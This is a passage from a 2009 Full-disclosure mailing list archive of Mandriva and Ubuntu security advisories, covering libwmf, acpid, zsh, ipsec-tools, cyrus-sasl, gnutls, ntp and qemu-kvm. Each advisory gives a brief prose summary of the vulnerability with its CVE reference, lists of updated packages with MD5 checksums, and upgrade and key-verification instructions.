2008.0/SRPMS/udev-114-7.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 8e05d00d129d11f2442390ec7dd4174c 2008.0/x86_64/lib64volume_id0-114-7.1mdv2008.0.x86_64.rpm 2718c04a037f773bca23b010265071ce 2008.0/x86_64/lib64volume_id0-devel-114-7.1mdv2008.0.x86_64.rpm 6756f2bb0dad6dee8188e5dccc1f92cb 2008.0/x86_64/udev-114-7.1mdv2008.0.x86_64.rpm b65a69fde92e29d6affa25d32e881dff 2008.0/x86_64/udev-doc-114-7.1mdv2008.0.x86_64.rpm bf39012f0e457b61fd203711625d78dc 2008.0/x86_64/udev-tools-114-7.1mdv2008.0.x86_64.rpm b6057c15bb22b381d07ee45a6bc81974 2008.0/SRPMS/udev-114-7.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF8RvmqjQ0CJFipgRAp5ZAJ0YBHRyssp4RsoVDk8awKDSM9mnhACgqeEn aP7lY4N3P6dafT+v4TzBfgE= =S27a -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 17:39:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 18:39:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:106-1 ] libwmf Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:106-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libwmf Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Use-after-free vulnerability in the embedded GD library in libwmf 0.2.8.4 allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WMF file (CVE-2009-1364). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1364 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: e17c0edd7acbe9bb6cf561aa0b85dc0b 2008.0/i586/libwmf0.2_7-0.2.8.4-14.1mdv2008.0.i586.rpm f9dc9d614f9448d3a1495897b9f21be2 2008.0/i586/libwmf0.2_7-devel-0.2.8.4-14.1mdv2008.0.i586.rpm 3a2f438e80d47d260bd953fd8ccb2451 2008.0/i586/libwmf-0.2.8.4-14.1mdv2008.0.i586.rpm 7b2f877fc6cb4766dbf77719e2750498 2008.0/SRPMS/libwmf-0.2.8.4-14.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 48865d83944f623fb80e5dd2ea43c46d 2008.0/x86_64/lib64wmf0.2_7-0.2.8.4-14.1mdv2008.0.x86_64.rpm 17e8a4121bbb4336d7aeb3ded0c51446 2008.0/x86_64/lib64wmf0.2_7-devel-0.2.8.4-14.1mdv2008.0.x86_64.rpm bc6630356cf5ba7dd6ce7f97f623d034 2008.0/x86_64/libwmf-0.2.8.4-14.1mdv2008.0.x86_64.rpm 7b2f877fc6cb4766dbf77719e2750498 2008.0/SRPMS/libwmf-0.2.8.4-14.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF8xtmqjQ0CJFipgRAvy0AKDU11NRWuuK8xEj0uy7P46Q4zjdagCg3WtC yEAYOkzj/+v2POxlwyI/oP4= =xvCc -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 17:46:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 18:46:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:107-1 ] acpid Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:107-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : acpid Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: The daemon in acpid before 1.0.10 allows remote attackers to cause a denial of service (CPU consumption and connectivity loss) by opening a large number of UNIX sockets without closing them, which triggers an infinite loop (CVE-2009-0798). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0798 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 5f69d7111e4922e03e2af0c9c790c807 2008.0/i586/acpid-1.0.6-1.2mdv2008.0.i586.rpm 965b27578aeba1ee0a6cd17179ab5ee1 2008.0/SRPMS/acpid-1.0.6-1.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 193600a65f75ad4cade617f5e728620d 2008.0/x86_64/acpid-1.0.6-1.2mdv2008.0.x86_64.rpm 965b27578aeba1ee0a6cd17179ab5ee1 2008.0/SRPMS/acpid-1.0.6-1.2mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF85OmqjQ0CJFipgRAnuyAJ94Oo91sxGRYITeMa/vYuVAOExk/ACeNN0w EB9qQGIQ6UAsIDZCBoNnxfQ= =4xFx -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 18:00:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 19:00:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:108-1 ] zsh Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:108-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : zsh Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A stack-based buffer overflow was found in the zsh command interpreter. An attacker could use this flaw to cause a denial of service (zsh crash), when providing a specially-crafted string as input to the zsh shell. The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 341fdf8d837fd349186b42db36cb6b5d 2008.0/i586/zsh-4.3.4-4.1mdv2008.0.i586.rpm 1fe0e1d84da10a334c70a9808d4fffd7 2008.0/i586/zsh-doc-4.3.4-4.1mdv2008.0.i586.rpm ca28c7f0b98d79f7f7e7e7c93b9afb2e 2008.0/SRPMS/zsh-4.3.4-4.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 65c003211e382a0059eb61ec7249bff9 2008.0/x86_64/zsh-4.3.4-4.1mdv2008.0.x86_64.rpm e784e85b82d32d672e56050972f004c2 2008.0/x86_64/zsh-doc-4.3.4-4.1mdv2008.0.x86_64.rpm ca28c7f0b98d79f7f7e7e7c93b9afb2e 2008.0/SRPMS/zsh-4.3.4-4.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF9FmmqjQ0CJFipgRAtsJAJ9whjyazzRhbx/lOrYjboEuwGHg1ACgvL7V P4EHVQLhm2xgrmtDNAakr+g= =xwt6 -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 18:14:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 19:14:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:112-1 ] ipsec-tools Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:112-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : ipsec-tools Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote attackers to cause a denial of service (crash) via crafted fragmented packets without a payload, which triggers a NULL pointer dereference (CVE-2009-1574). Updated packages are available that brings ipsec-tools to version 0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous bugfixes over the previous 0.7.1 version, and also corrects this issue. ipsec-tools for Mandriva Linux Corporate Server 4 has been patched to address this issue. Additionally the flex package required for building ipsec-tools has been fixed due to ipsec-tools build problems and is also available with this update. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1574 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 8256debb7fe84394de70499907060de6 2008.0/i586/flex-2.5.33-2.1mdv2008.0.i586.rpm c03c0f9fe8f564ea777b82789ac95f41 2008.0/i586/ipsec-tools-0.7.2-0.1mdv2008.0.i586.rpm 9da2195c693a7fe40f7afb3c5806aaca 2008.0/i586/libipsec0-0.7.2-0.1mdv2008.0.i586.rpm 29dcc9414a59cba30ce801b9fef416a6 2008.0/i586/libipsec-devel-0.7.2-0.1mdv2008.0.i586.rpm b3ceeee8a3a36388d02426b77a45d862 2008.0/SRPMS/flex-2.5.33-2.1mdv2008.0.src.rpm b0cb7993f29eac3d5f170c7cd3cf0cb5 2008.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 36c5d0eb92197c814b90c814d21d3372 2008.0/x86_64/flex-2.5.33-2.1mdv2008.0.x86_64.rpm 7a976c988badcb9fae93509acfe99aa2 2008.0/x86_64/ipsec-tools-0.7.2-0.1mdv2008.0.x86_64.rpm 85b8ed6e328b048c13eb503bfee8dcdc 2008.0/x86_64/lib64ipsec0-0.7.2-0.1mdv2008.0.x86_64.rpm a22f34f1cfac38c9029eb032e3257285 2008.0/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2008.0.x86_64.rpm b3ceeee8a3a36388d02426b77a45d862 2008.0/SRPMS/flex-2.5.33-2.1mdv2008.0.src.rpm b0cb7993f29eac3d5f170c7cd3cf0cb5 2008.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF9S3mqjQ0CJFipgRAvt/AKDfzDyHHqoCZiMoxKn8Ik2xAqIfsgCfXaCL 6Jl97rfN27eup9AJRmyBBJc= =2nWo -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 18:25:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 19:25:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:113-1 ] cyrus-sasl Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:113-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : cyrus-sasl Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple buffer overflows in the CMU Cyrus SASL library before 2.1.23 might allow remote attackers to execute arbitrary code or cause a denial of service application crash) via strings that are used as input to the sasl_encode64 function in lib/saslutil.c (CVE-2009-0688). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0688 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 0b5da906226132af2c2ed8270343f557 2008.0/i586/cyrus-sasl-2.1.22-23.1mdv2008.0.i586.rpm de005340f6be93e76feb3d5fe94e2d54 2008.0/i586/libsasl2-2.1.22-23.1mdv2008.0.i586.rpm 3d919ce1d732f655ca6be7a89d434acd 2008.0/i586/libsasl2-devel-2.1.22-23.1mdv2008.0.i586.rpm 540c3b13f892438d8795c17cc89d42bf 2008.0/i586/libsasl2-plug-anonymous-2.1.22-23.1mdv2008.0.i586.rpm d13e5e77f0949d58097eb2f734a10255 2008.0/i586/libsasl2-plug-crammd5-2.1.22-23.1mdv2008.0.i586.rpm 5950850223017fdf5a4b47f0618b55de 2008.0/i586/libsasl2-plug-digestmd5-2.1.22-23.1mdv2008.0.i586.rpm 5f1c9ad40cdf003c28ca1be8381d8029 2008.0/i586/libsasl2-plug-gssapi-2.1.22-23.1mdv2008.0.i586.rpm 08bbfad70b61a514204344a125413e14 2008.0/i586/libsasl2-plug-ldapdb-2.1.22-23.1mdv2008.0.i586.rpm 64386e5dd2a108387dc43379a5513e9c 2008.0/i586/libsasl2-plug-login-2.1.22-23.1mdv2008.0.i586.rpm 6447f2431d59bc5b30345259f276f6b3 2008.0/i586/libsasl2-plug-ntlm-2.1.22-23.1mdv2008.0.i586.rpm 93ae062a1aaab4e973859ef402a5a242 2008.0/i586/libsasl2-plug-otp-2.1.22-23.1mdv2008.0.i586.rpm 91c60f6ec94f4dddc5868588a4b8f68b 2008.0/i586/libsasl2-plug-plain-2.1.22-23.1mdv2008.0.i586.rpm f5a00cdd4639421ca1ee15cc0be63eac 2008.0/i586/libsasl2-plug-sasldb-2.1.22-23.1mdv2008.0.i586.rpm 3d497c02f84a1c3328fdb391643da44c 2008.0/i586/libsasl2-plug-sql-2.1.22-23.1mdv2008.0.i586.rpm 6c88dcfd5ab050abd18f4d2983c79300 2008.0/SRPMS/cyrus-sasl-2.1.22-23.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 80d99cc844c67a2a06759bc1e7cc88db 2008.0/x86_64/cyrus-sasl-2.1.22-23.1mdv2008.0.x86_64.rpm 41b95422b894401eecc2a8681c9dc196 2008.0/x86_64/lib64sasl2-2.1.22-23.1mdv2008.0.x86_64.rpm 50f33da97b5da9b4bc30ec5bc6d1d659 2008.0/x86_64/lib64sasl2-devel-2.1.22-23.1mdv2008.0.x86_64.rpm d4fb022df681b367b8679136f72b592e 2008.0/x86_64/lib64sasl2-plug-anonymous-2.1.22-23.1mdv2008.0.x86_64.rpm 5d927f67880f4aa762fb367d77641721 2008.0/x86_64/lib64sasl2-plug-crammd5-2.1.22-23.1mdv2008.0.x86_64.rpm aed157358368d9ff50959a74fe9c25e4 2008.0/x86_64/lib64sasl2-plug-digestmd5-2.1.22-23.1mdv2008.0.x86_64.rpm 84d23ab14f7382f7c7ea6b5967ef2f40 2008.0/x86_64/lib64sasl2-plug-gssapi-2.1.22-23.1mdv2008.0.x86_64.rpm 9e4e676d2fbd739510acc32c0c43be95 2008.0/x86_64/lib64sasl2-plug-ldapdb-2.1.22-23.1mdv2008.0.x86_64.rpm 4db9412d9b049a07c6cd4a79763d6753 2008.0/x86_64/lib64sasl2-plug-login-2.1.22-23.1mdv2008.0.x86_64.rpm ea10f518bb59213ef01857ea4dc0aa4d 2008.0/x86_64/lib64sasl2-plug-ntlm-2.1.22-23.1mdv2008.0.x86_64.rpm 63d56373895ddc03a85d4dd3ca1f960a 2008.0/x86_64/lib64sasl2-plug-otp-2.1.22-23.1mdv2008.0.x86_64.rpm 4b655bbd94e9693ea9f57811bd0efad3 2008.0/x86_64/lib64sasl2-plug-plain-2.1.22-23.1mdv2008.0.x86_64.rpm 5050def960a29e2857cd132785a21143 2008.0/x86_64/lib64sasl2-plug-sasldb-2.1.22-23.1mdv2008.0.x86_64.rpm febdbe8c8c23b096a78ea20dc8ceca75 2008.0/x86_64/lib64sasl2-plug-sql-2.1.22-23.1mdv2008.0.x86_64.rpm 6c88dcfd5ab050abd18f4d2983c79300 2008.0/SRPMS/cyrus-sasl-2.1.22-23.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF9djmqjQ0CJFipgRApFRAKC/uig37ZdrVvHGHDTHuj98+3tYcwCeMQgy +UCg830NyZjsOIM1X1eAOhE= =2Rcl -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 19:29:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 20:29:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:308 ] gnutls Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:308 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gnutls Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in gnutls: gnutls-cli in GnuTLS before 2.6.6 does not verify the activation and expiration times of X.509 certificates, which allows remote attackers to successfully present a certificate that is (1) not yet valid or (2) no longer valid, related to lack of time checks in the _gnutls_x509_verify_certificate function in lib/x509/verify.c in libgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup (CVE-2009-1417). A vulnerability have been discovered and corrected in GnuTLS before 2.8.2, which could allow man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority (CVE-2009-2730). Packages for 2008.0 are being provided due to extended support for Corporate products. This update fixes this vulnerability. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1417 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2730 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: b0476297b05fee1e5379a8826905757f 2008.0/i586/gnutls-2.0.0-2.4mdv2008.0.i586.rpm 31f117592b8dcb5c3b80b8fde7d2cf2b 2008.0/i586/libgnutls13-2.0.0-2.4mdv2008.0.i586.rpm f9580a96c2b938a67ffc821b4536ce05 2008.0/i586/libgnutls-devel-2.0.0-2.4mdv2008.0.i586.rpm 2d4a130600be226d1ace20f6de574edb 2008.0/SRPMS/gnutls-2.0.0-2.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: c36eb24563dc027a84aee5f7b4e0e792 2008.0/x86_64/gnutls-2.0.0-2.4mdv2008.0.x86_64.rpm 3e58a09629aac586a5f1697063d04421 2008.0/x86_64/lib64gnutls13-2.0.0-2.4mdv2008.0.x86_64.rpm 58fbcf88685697a5a2a7959fbd84420d 2008.0/x86_64/lib64gnutls-devel-2.0.0-2.4mdv2008.0.x86_64.rpm 2d4a130600be226d1ace20f6de574edb 2008.0/SRPMS/gnutls-2.0.0-2.4mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF+Y3mqjQ0CJFipgRAjwhAJ4qfWW60ocYAHhKFR2tnFdvyjUqNQCeO+K2 DJynsXMpzvrD4rEBCyT14Io= =3onS -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 19:48:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 20:48:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:309 ] ntp Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:309 http://www.mandriva.com/security/ _______________________________________________________________________ Package : ntp Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in ntp: Requesting peer information from a malicious remote time server may lead to an unexpected application termination or arbitrary code execution (CVE-2009-0159). A buffer overflow flaw was discovered in the ntpd daemon's NTPv4 authentication code. If ntpd was configured to use public key cryptography for NTP packet authentication, a remote attacker could use this flaw to send a specially-crafted request packet that could crash ntpd (CVE-2009-1252). Packages for 2008.0 are being provided due to extended support for Corporate products. The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: ce17e1c2cf64b1181b1172f3933fe705 2008.0/i586/ntp-4.2.4-10.2mdv2008.0.i586.rpm 66baede7d5a42d16d19639148f5e4d52 2008.0/i586/ntp-client-4.2.4-10.2mdv2008.0.i586.rpm f708723a1ab549c987ad64fa2862eb80 2008.0/i586/ntp-doc-4.2.4-10.2mdv2008.0.i586.rpm fb352aa8910f1bc1319df986769d15ab 2008.0/SRPMS/ntp-4.2.4-10.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: b8519fa3b101a246d35d173745267d6c 2008.0/x86_64/ntp-4.2.4-10.2mdv2008.0.x86_64.rpm dd862d4411bfee35041267817e1e2f0e 2008.0/x86_64/ntp-client-4.2.4-10.2mdv2008.0.x86_64.rpm c38355a0069bc68c50e48726bd5d04e7 2008.0/x86_64/ntp-doc-4.2.4-10.2mdv2008.0.x86_64.rpm fb352aa8910f1bc1319df986769d15ab 2008.0/SRPMS/ntp-4.2.4-10.2mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF+rdmqjQ0CJFipgRAodXAKC5aT0ePLmbNSalOgR03MecOfci4ACaA4JY Uc/m/wcRzfz3Nbleml90qVQ= =ClV1 -----END PGP SIGNATURE----- From jamie at canonical.com Thu Dec 3 20:01:04 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Thu, 3 Dec 2009 14:01:04 -0600 Subject: [Full-disclosure] [USN-863-1] QEMU vulnerability Message-ID: <20091203200104.GB6730@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-863-1 December 03, 2009 qemu-kvm vulnerability https://launchpad.net/bugs/458521 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: qemu-kvm 0.11.0-0ubuntu6.3 After a standard system upgrade you need to restart any QEMU guests to effect the necessary changes. Details follow: It was discovered that QEMU did not properly setup the virtio networking features available to its guests. A remote attacker could exploit this to crash QEMU guests which use virtio networking on Linux kernels earlier than 2.6.26. Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3.diff.gz Size/MD5: 48984 14fa43af0ed17b918c50803f91b1480d http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3.dsc Size/MD5: 1377 18f25eed2408085a81ad70f39d74a835 http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0.orig.tar.gz Size/MD5: 4382897 440837a062967102a68e634d57eaf719 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/kvm_84+dfsg-0ubuntu16+0.11.0+0ubuntu6.3_amd64.deb Size/MD5: 9106 b15b1b8a62f13822a3932abd54a5f924 http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3_amd64.deb Size/MD5: 2813520 49b26fe83d6c4a5c9befd6716a3431a9 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-arm-static_0.11.0-0ubuntu6.3_amd64.deb Size/MD5: 636074 d9f0b9d5ff621c8b56b9fca53c0ae5d2 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-kvm-extras_0.11.0-0ubuntu6.3_amd64.deb Size/MD5: 15469258 dd6a9beb5c7d51b43785df232a3a3c40 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu_0.11.0-0ubuntu6.3_amd64.deb Size/MD5: 8560 2bb181fcf769aafd08d26aa531bb24a4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/kvm_84+dfsg-0ubuntu16+0.11.0+0ubuntu6.3_i386.deb Size/MD5: 9104 0a0a8a786ad29625fe5aa3de79c5cd98 http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3_i386.deb Size/MD5: 2592100 3023e22d5e6b3ff51fcf3641cd039e93 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-arm-static_0.11.0-0ubuntu6.3_i386.deb Size/MD5: 558556 5d369da01ec40b1d79b7e015d9982302 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-kvm-extras_0.11.0-0ubuntu6.3_i386.deb Size/MD5: 13984728 5464f6de725b919cdb4bd7252d221016 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu_0.11.0-0ubuntu6.3_i386.deb Size/MD5: 8562 3e34c884aff529f95a2975cdb08b2723 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/q/qemu-kvm/kvm_84+dfsg-0ubuntu16+0.11.0+0ubuntu6.3_lpia.deb Size/MD5: 9104 156a8ede19f2d65929e73f119415f1b7 http://ports.ubuntu.com/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3_lpia.deb Size/MD5: 2621316 02b4e9168fdacc9ab8955de557c64a7d http://ports.ubuntu.com/pool/universe/q/qemu-kvm/qemu-arm-static_0.11.0-0ubuntu6.3_lpia.deb Size/MD5: 578522 eb5a953dc2d59c2893656467bc879c25 http://ports.ubuntu.com/pool/universe/q/qemu-kvm/qemu-kvm-extras_0.11.0-0ubuntu6.3_lpia.deb Size/MD5: 14110238 ee2d23ca2c7d25f37e5cb4d315730ad4 http://ports.ubuntu.com/pool/universe/q/qemu-kvm/qemu_0.11.0-0ubuntu6.3_lpia.deb Size/MD5: 8560 7c2df17d8e67444172c9093c28a01d71 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091203/8226a617/attachment.bin From security at mandriva.com Thu Dec 3 20:11:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 21:11:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:310 ] openssl Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:310 http://www.mandriva.com/security/ _______________________________________________________________________ Package : openssl Date : December 3, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Multiple security 